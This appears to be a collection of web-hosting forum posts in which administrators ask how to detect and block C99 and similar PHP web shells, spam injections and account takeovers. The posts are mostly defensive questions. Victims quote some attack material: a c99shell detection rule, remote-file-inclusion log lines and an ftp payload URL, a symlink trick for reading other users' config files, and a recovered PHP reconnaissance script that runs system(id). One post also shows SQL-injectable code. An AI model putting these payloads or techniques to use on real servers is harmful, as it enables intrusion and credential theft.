C99Shell Stop Shell Hacking Totally?
Oct 19, 2007
Is there a way to stop them totally? i.e. even though they are successfully uploaded but I do not want the source to be available to them etc.?
I mean, is there a way to hide or not allow them to execute any shell?
Nov 5, 2009
How to stop scripts like c99 shell from installing onto the server?
Aug 15, 2008
How can I detect and disable C99 shell and other shell scripts, e.g. r57 ....
Sep 1, 2008
I have a few scripts, but hackers again upload c99 in some way and hack some SMF forums on the server. The server as a server they cannot hack, but user accounts they can. So please tell me, what do you advise?
Feb 6, 2009
A site I manage for a client is being hacked every couple of days. It's not the actual site but the host's server that's getting attacked: all sites on that server, well, actually all their servers.
They have made no attempt to sort this problem. I report it, they look at the site and say "site loads fine for us", which it does.
All index files are having a base64-encoded line written after the <body> tag; this adds hundreds of spam links which are hidden with display:none; they also add .html to application types in htaccess for php to run in these files too.
Problem is, I am moving the site to another host but cannot change the nameservers to the new host's until the client returns from a holiday, so I must keep the site up on the insecure host for now.
I am removing the spam code almost daily. Is there any way I can stop this attack happening for the time being? The host does nothing.
Apr 23, 2009
One of my client accounts has just been hacked with the c.100 exploit. This method injects 1 php file that acts like a fully featured file manager. This hacker uses my client account to place multiple scam & phishing sites.
Now I'm wondering if this kind of exploit hacking has a way to counter it, as my friend said that there aren't any proven methods until now :-/
This is the php file I've recovered:
<<url removed>>
FYI, my server configuration:
- apache 2.2.11
- centos 5.2
- cpanel + whm 11.24.4
- suphp, clamav & modsec enabled
Jul 13, 2008
Recently my site was defaced, (i own a dedicated server), my server was not touched, but one of the applications I used on the site was exploited to gain access to it.
I have noticed 4 or 5 c99 shells in different locations on my ftp. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using CentOS 5.
How can I easily search for these on my box? Can I disable their functionality? Is there a setting I can use in htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF. How can I at least enable safemode?
I don't know much of anything about linux, but I am running cpanel and WHM. I have a guy who manages my box but he is hard to get a hold of sometimes, and I'd like to take care of this ASAP!
Aug 17, 2007
How can I block somebody from sending email using ....@server.myserver.com?
I terminated his account, but he is using ...@server.myserver.com
I need to have a company who can take care of these issues.
Jun 10, 2008
Has anyone had any more luck getting a response to either tickets or emails from Burton Hosting since the last thread here, which is months old? Our uptime remains decent, but with absolutely no responses to tickets (we have many outstanding by now) or emails (both to the standard network and support addresses and to individuals personally), and their phones disconnected, we of course are very concerned, and will probably be forced to look for a new host (I just hate the hassle!!) when our contract expires next month.
I did find in another forum posts about a Virante Marketing fiasco in which Burton was falsifying reviews, etc.---this does NOT sound like the Burton I knew before.
While we have exploratory emails out to DreamHost and a few others, I was hoping someone here would know a way to contact Burton---I just hate not knowing!
Jul 26, 2009
Quad Core server, 4GB RAM. MySQL runs at all times between 200 - 300% CPU. Server does only 5K uniques per day, and runs Zen Cart.
I am at a loss. I have experience with tracking down reasons for this, but this one has stumped me. So I was hoping to get new eyes on this and see if anyone had any ideas.
my.cnf
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
#old_passwords=1
skip-locking
skip-name-resolve
skip-bdb
key_buffer = 64M
max_allowed_packet = 16M
table_cache = 2048
sort_buffer_size = 1M
read_buffer_size = 1M
read_rnd_buffer_size = 8M
myisam_sort_buffer_size = 64M
thread_cache_size = 16
thread_concurrency = 8
query_cache_size = 25M
query_cache_type = 1
tmp_table_size=64M
back_log = 100
max_connect_errors = 10000
join_buffer_size=1M
open-files = 20000
interactive_timeout = 300
wait_timeout = 300
max_connections=200
# The following directives should be commented out
# but included as they are things that get added
# very frequently on tickets. These are more in a
# need-this-feature basis.
# The below 2 cannot be set on the fly. If the customer already has
# InnoDB tables and wants to change the size of the InnoDB tablespace
# and InnoDB logs, then:
# 1. Run a full backup with mysqldump
# 2. Stop MySQL
# 3. Move current ibdata and ib_logfiles out of /var/lib/mysql
# 4. Uncomment the below innodb_data_file_path and innodb_log_file_size
# 5. Start MySQL (it will recreate new InnoDB files)
# 6. Restore data from backup
#innodb_data_file_path = ibdata1:2000M;ibdata2:10M:autoextend
#innodb_log_file_size = 100M
innodb_buffer_pool_size = 64M
innodb_additional_mem_pool_size = 8M
#log-slow-queries=/var/lib/mysqllogs/slow-log
#long_query_time=2
#log-queries-not-using-indexes
#log-bin=/var/lib/mysqllogs/bin-log
#log-slave-updates
#expire_logs_days = 14
server-id = 1
[mysql.server]
user=mysql
#basedir=/var/lib
[mysqld_safe]
err-log=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid
open_files_limit=65536
mysqladmin status
Uptime: 1458 Threads: 1 Questions: 366975 Slow queries: 0 Opens: 401 Flush tables: 1 Open tables: 395 Queries per second avg: 251.698
SHOW STATUS;
mysql> SHOW STATUS;
+-----------------------------------+----------+
| Variable_name | Value |
+-----------------------------------+----------+
| Aborted_clients | 0 |
| Aborted_connects | 8 |
| Binlog_cache_disk_use | 0 |
| Binlog_cache_use | 0 |
| Bytes_received | 116 |
| Bytes_sent | 157 |
| Com_admin_commands | 0 |
| Com_alter_db | 0 |
| Com_alter_table | 0 |
| Com_analyze | 0 |
| Com_backup_table | 0 |
| Com_begin | 0 |
| Com_call_procedure | 0 |
| Com_change_db | 0 |
| Com_change_master | 0 |
| Com_check | 0 |
| Com_checksum | 0 |
| Com_commit | 0 |
| Com_create_db | 0 |
| Com_create_function | 0 |
| Com_create_index | 0 |
| Com_create_table | 0 |
| Com_create_user | 0 |
| Com_dealloc_sql | 0 |
| Com_delete | 0 |
| Com_delete_multi | 0 |
| Com_do | 0 |
| Com_drop_db | 0 |
| Com_drop_function | 0 |
| Com_drop_index | 0 |
| Com_drop_table | 0 |
| Com_drop_user | 0 |
| Com_execute_sql | 0 |
| Com_flush | 0 |
| Com_grant | 0 |
| Com_ha_close | 0 |
| Com_ha_open | 0 |
| Com_ha_read | 0 |
| Com_help | 0 |
| Com_insert | 0 |
| Com_insert_select | 0 |
| Com_kill | 0 |
| Com_load | 0 |
| Com_load_master_data | 0 |
| Com_load_master_table | 0 |
| Com_lock_tables | 0 |
| Com_optimize | 0 |
| Com_preload_keys | 0 |
| Com_prepare_sql | 0 |
| Com_purge | 0 |
| Com_purge_before_date | 0 |
| Com_rename_table | 0 |
| Com_repair | 0 |
| Com_replace | 0 |
| Com_replace_select | 0 |
| Com_reset | 0 |
| Com_restore_table | 0 |
| Com_revoke | 0 |
| Com_revoke_all | 0 |
| Com_rollback | 0 |
| Com_savepoint | 0 |
| Com_select | 1 |
| Com_set_option | 0 |
| Com_show_binlog_events | 0 |
| Com_show_binlogs | 0 |
| Com_show_charsets | 0 |
| Com_show_collations | 0 |
| Com_show_column_types | 0 |
| Com_show_create_db | 0 |
| Com_show_create_table | 0 |
| Com_show_databases | 0 |
| Com_show_errors | 0 |
| Com_show_fields | 0 |
| Com_show_grants | 0 |
| Com_show_innodb_status | 0 |
| Com_show_keys | 0 |
| Com_show_logs | 0 |
| Com_show_master_status | 0 |
| Com_show_ndb_status | 0 |
| Com_show_new_master | 0 |
| Com_show_open_tables | 0 |
| Com_show_privileges | 0 |
| Com_show_processlist | 0 |
| Com_show_slave_hosts | 0 |
| Com_show_slave_status | 0 |
| Com_show_status | 1 |
| Com_show_storage_engines | 0 |
| Com_show_tables | 0 |
| Com_show_triggers | 0 |
| Com_show_variables | 0 |
| Com_show_warnings | 0 |
| Com_slave_start | 0 |
| Com_slave_stop | 0 |
| Com_stmt_close | 0 |
| Com_stmt_execute | 0 |
| Com_stmt_fetch | 0 |
| Com_stmt_prepare | 0 |
| Com_stmt_reset | 0 |
| Com_stmt_send_long_data | 0 |
| Com_truncate | 0 |
| Com_unlock_tables | 0 |
| Com_update | 0 |
| Com_update_multi | 0 |
| Com_xa_commit | 0 |
| Com_xa_end | 0 |
| Com_xa_prepare | 0 |
| Com_xa_recover | 0 |
| Com_xa_rollback | 0 |
| Com_xa_start | 0 |
| Compression | OFF |
| Connections | 1569 |
| Created_tmp_disk_tables | 0 |
| Created_tmp_files | 5 |
| Created_tmp_tables | 1 |
| Delayed_errors | 0 |
| Delayed_insert_threads | 0 |
| Delayed_writes | 0 |
| Flush_commands | 1 |
| Handler_commit | 0 |
| Handler_delete | 0 |
| Handler_discover | 0 |
| Handler_prepare | 0 |
| Handler_read_first | 0 |
| Handler_read_key | 0 |
| Handler_read_next | 0 |
| Handler_read_prev | 0 |
| Handler_read_rnd | 0 |
| Handler_read_rnd_next | 0 |
| Handler_rollback | 0 |
| Handler_savepoint | 0 |
| Handler_savepoint_rollback | 0 |
| Handler_update | 0 |
| Handler_write | 132 |
| Innodb_buffer_pool_pages_data | 307 |
| Innodb_buffer_pool_pages_dirty | 0 |
| Innodb_buffer_pool_pages_flushed | 1 |
| Innodb_buffer_pool_pages_free | 3787 |
| Innodb_buffer_pool_pages_latched | 0 |
| Innodb_buffer_pool_pages_misc | 2 |
| Innodb_buffer_pool_pages_total | 4096 |
| Innodb_buffer_pool_read_ahead_rnd | 2 |
| Innodb_buffer_pool_read_ahead_seq | 0 |
| Innodb_buffer_pool_read_requests | 48197 |
| Innodb_buffer_pool_reads | 205 |
| Innodb_buffer_pool_wait_free | 0 |
| Innodb_buffer_pool_write_requests | 1 |
| Innodb_data_fsyncs | 7 |
| Innodb_data_pending_fsyncs | 0 |
| Innodb_data_pending_reads | 0 |
| Innodb_data_pending_writes | 0 |
| Innodb_data_read | 7213056 |
| Innodb_data_reads | 221 |
| Innodb_data_writes | 7 |
| Innodb_data_written | 35328 |
| Innodb_dblwr_pages_written | 1 |
| Innodb_dblwr_writes | 1 |
| Innodb_log_waits | 0 |
| Innodb_log_write_requests | 0 |
| Innodb_log_writes | 2 |
| Innodb_os_log_fsyncs | 5 |
| Innodb_os_log_pending_fsyncs | 0 |
| Innodb_os_log_pending_writes | 0 |
| Innodb_os_log_written | 1024 |
| Innodb_page_size | 16384 |
| Innodb_pages_created | 0 |
| Innodb_pages_read | 307 |
| Innodb_pages_written | 1 |
| Innodb_row_lock_current_waits | 0 |
| Innodb_row_lock_time | 0 |
| Innodb_row_lock_time_avg | 0 |
| Innodb_row_lock_time_max | 0 |
| Innodb_row_lock_waits | 0 |
| Innodb_rows_deleted | 0 |
| Innodb_rows_inserted | 0 |
| Innodb_rows_read | 165 |
| Innodb_rows_updated | 0 |
| Key_blocks_not_flushed | 0 |
| Key_blocks_unused | 52512 |
| Key_blocks_used | 1074 |
| Key_read_requests | 24616475 |
| Key_reads | 1170 |
| Key_write_requests | 11301 |
| Key_writes | 4948 |
| Last_query_cost | 0.000000 |
| Max_used_connections | 13 |
| Not_flushed_delayed_rows | 0 |
| Open_files | 495 |
| Open_streams | 0 |
| Open_tables | 395 |
| Opened_tables | 0 |
| Prepared_stmt_count | 0 |
| Qcache_free_blocks | 440 |
| Qcache_free_memory | 2620672 |
| Qcache_hits | 293141 |
| Qcache_inserts | 69381 |
| Qcache_lowmem_prunes | 60094 |
| Qcache_not_cached | 20918 |
| Qcache_queries_in_cache | 1338 |
| Qcache_total_blocks | 5755 |
| Questions | 394590 |
| Rpl_status | NULL |
| Select_full_join | 0 |
| Select_full_range_join | 0 |
| Select_range | 0 |
| Select_range_check | 0 |
| Select_scan | 1 |
| Slave_open_temp_tables | 0 |
| Slave_retried_transactions | 0 |
| Slave_running | OFF |
| Slow_launch_threads | 0 |
| Slow_queries | 0 |
| Sort_merge_passes | 0 |
| Sort_range | 0 |
| Sort_rows | 0 |
| Sort_scan | 0 |
| Ssl_accept_renegotiates | 0 |
| Ssl_accepts | 0 |
| Ssl_callback_cache_hits | 0 |
| Ssl_cipher | |
| Ssl_cipher_list | |
| Ssl_client_connects | 0 |
| Ssl_connect_renegotiates | 0 |
| Ssl_ctx_verify_depth | 0 |
| Ssl_ctx_verify_mode | 0 |
| Ssl_default_timeout | 0 |
| Ssl_finished_accepts | 0 |
| Ssl_finished_connects | 0 |
| Ssl_session_cache_hits | 0 |
| Ssl_session_cache_misses | 0 |
| Ssl_session_cache_mode | NONE |
| Ssl_session_cache_overflows | 0 |
| Ssl_session_cache_size | 0 |
| Ssl_session_cache_timeouts | 0 |
| Ssl_sessions_reused | 0 |
| Ssl_used_session_cache_entries | 0 |
| Ssl_verify_depth | 0 |
| Ssl_verify_mode | 0 |
| Ssl_version | |
| Table_locks_immediate | 173929 |
| Table_locks_waited | 3 |
| Tc_log_max_pages_used | 0 |
| Tc_log_page_size | 0 |
| Tc_log_page_waits | 0 |
| Threads_cached | 11 |
| Threads_connected | 2 |
| Threads_created | 13 |
| Threads_running | 2 |
| Uptime | 1540 |
| Uptime_since_flush_status | 1540 |
+-----------------------------------+----------+
Oct 7, 2009
I'm configuring a VPS that's going to serve all static stuff and absolutely no dynamic scripts at all.
What could be the bottlenecks with all these static content websites? Can a 256MB VPS handle a static website receiving millions of page views a month?
Dec 11, 2013
I am trying to get an Apache (Win7x64) to run using totally custom config files. So far I have this:
Code : httpd.exe -f ......confapachehttpd.conf
Loads fine and here is my trivial config:
Code:
Listen 8082
ServerRoot webinapacheapache-2.4
ServerName fitrak.me
DocumentRoot webhomewebsites
Regardless of whether I make the DocumentRoot absolute or relative Apache still won't load index.html
500 Internal Server Error
Nothing coming up erroneous in the logs...WTF am I missing???
The port is not occupied...
Jul 8, 2008
Does anyone know how to change a jail shell to a normal shell?
Jul 30, 2009
I found these folders in the root
/usr/bin/c99
/usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp
/usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp
What are these? Are these normal folders, or has somebody hacked our server?
What shall I do?
Jul 1, 2009
I just installed Zen Cart on my web hosting, and a few days later I saw some files written like core1405.php, and when I opened the file to view it, it was actually the trojan c99shell.
I have deleted all of the core files. Now how can I prevent it from happening again? Because it is too much work to clean up the hosting server.
Jun 5, 2007
I installed modsecurity from the Addon modules in cPanel.
When I try to use phpshell, it works well without any errors and I can do anything, despite the presence of the modsecurity protection and disable_functions in php.ini.
Are there particular settings to add to httpd.conf to prevent phpshell from being used, or to prevent it from being uploaded to the site?
Jun 25, 2007
Guys, I'm tired of fighting those hackers every day! I have about 20 websites, and every day I have one of them hacked! I restore a backup, then another one is hacked!
That's unbelievable!!!
Those bastards upload their shell scripts to websites via bugs or whatever from php files!!
Is there any way to stop these commands?
Can .htaccess help? How?
I talked to the web hosting companies for my websites! ....
Sep 3, 2007
The biggest security issue I have with my clients is php c99 shell and similar php files. Somehow these files are uploaded to the website, and from there they start attacking the websites.
I have also seen that once you upload the c99 php file you are able to see the accounts' information (such as a user name) on the same server.
So is there any way to disable this kind of php file, or at least disable some functions within the file?
I have been thinking of installing and running an antivirus on the server, but I see that sometimes they upload the encrypted version of the file, so the antivirus can't catch the file as a trojan!
Oct 3, 2007
I want to prevent c99shell scripts from running.
I found this rule to detect URI's for the c99 shell.
#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the
script some random name like .../myphpstuff.php. So the URI no longer helps detect it.
How could I detect "c99shell" in the actual file that Apache serves? This assumes that the hacker was successful in installing it.
My box:
Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0
May 7, 2009
Today I have a lot of hacking on my server.
I searched for shell scripts on the server, and I found a lot of them:
[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt
As you can see, he uploaded the files to this account "koky" and redirected these files to the user1, user2, user3, user4 and user5 accounts.
And he could read the config.php and then hacked the site easily!!
I read before that the reason for this is Perl on the server, and the way to solve it is to edit httpd.conf by adding this to it:
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
and then restart the http:
service httpd restart
I did all of that, and when I restarted http it said:
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration
and all the sites went down!
I deleted:
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
from httpd.conf, and then the sites worked correctly.
So you all know my problem now! And I think a lot of you have the same problem, so I wish we would all try to find a solution for this and learn the best way to protect Perl on the server.
Jun 8, 2009
As we all know, there has been a HyperVM exploit which may have taken down fsckvps, and other hosts have been having attacks. If possible, install any program that will warn you of a connection to your server and/or provide input on what it may or may not be.
I myself just had a blank php format file uploaded to a client's VPS and it tried accessing other VPS servers. As far as I know the IP was rapidly changing and untraceable (this may or may not be from the exploit). If anyone else is having HyperVM attacks or server attacks, please post here, so that instead of working within our own companies we are working as a group of over 10 thousand+ WHT members to solve this issue ourselves.
(mods may move this wherever)
Jan 15, 2008
I have a server, and these days my server is being hacked by a hacker. The problem is chmod 777: there are many dirs with chmod 777, and the hacker is uploading files and creating folders under the folders which are created with chmod 777. Now I just want to know how I can block the hacker, and whether there is any way to allow the scripts which are on my server and not allow any other scripts to upload files to my server.
I have a Linux server.
Feb 22, 2007
In the referral logs that I keep on a website, I have come across the following this morning. Is this someone who is trying to gain access to the server etc.?
[url]
[url]
[url]
[url]
[url]
I have the IP addresses that they have come from, and they resolve to a Russian (I think) website.
I'm just looking through all the folders on the server now and no data has been compromised as far as I can see, and I'm going to use the query strings in order to block access and also deny access via IP address.
Jun 27, 2007
A lot of databases on my server were hacked.
The hacker can edit tables.
Are there any ports in MYSQL4?
Jun 20, 2007
A lot of VB forums are being hacked every day.
In fact, all the hackers couldn't hack databases or files.
They only edit one template in the style, like header or forumhome.
So uploading the style again resolves the problem.
But how can I disallow them from editing templates?
Any functions to disable, or a rule for mod_sec?
Sep 13, 2007
See the log entries below:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{X-Forwarded-For}i\""
1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
Nov 29, 2007
I keep reading all these devastating posts about people's machines being compromised. Are most of these hacks due to weak passwords of administrators or clients which end up getting bruted, or are there known exploits for cpanel/plesk/apache etc? I am setting up an apache-only server with a really secure password, but I am wondering if it could still be breached using an exploit.
Apr 25, 2007
Purely by accident I logged in a few minutes ago onto my server and ran a 'ps -ax'
At the very end I had the following lines:
29803 ? S 0:00 /bin/sh /usr/local/sbin/bfd -s
29804 ? D 0:00 /bin/sh /usr/local/bfd/tlog /var/log/secure sshd.4
29805 ? S 0:00 grep sshd
29807 ? S 0:00 grep -viw error: Bind
29808 ? S 0:00 sed s/::ffff://
29814 ? S 0:00 grep -iw Illegal user
29816 ? S 0:00 grep -iwv Failed password for illegal user
29817 ? S 0:00 grep -iwf /usr/local/bfd/pattern.auth
29818 ? S 0:00 awk {print$10":"$8}
29819 ? S 0:00 grep -E [0-9]+
Is this someone hacking my password file or is this something different?
May 28, 2008
I had done a program in early 2006 for a site in php-mysql. At the time of writing the code, the code written was not so standard: it contained uninitialized variables used for include file paths (even though values are assigned to them before use), and the "sess" folder was created within the website folder. Also, the parameters for the SQL query were not escaped, but everything was working fine.
And now I was informed that the insecure code in my program caused the server crash and I have to pay the penalty for the same. Can anyone let me know whether the code below, or keeping the session variables within a folder inside /www/, will make the sites hosted on the server where this program runs stop/crash forever?
------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);
......
-------------------------------------------------------------------
Jul 20, 2008
I am having an issue with my server. Someone is trying to execute some code and possibly trying a MySQL injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so I can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>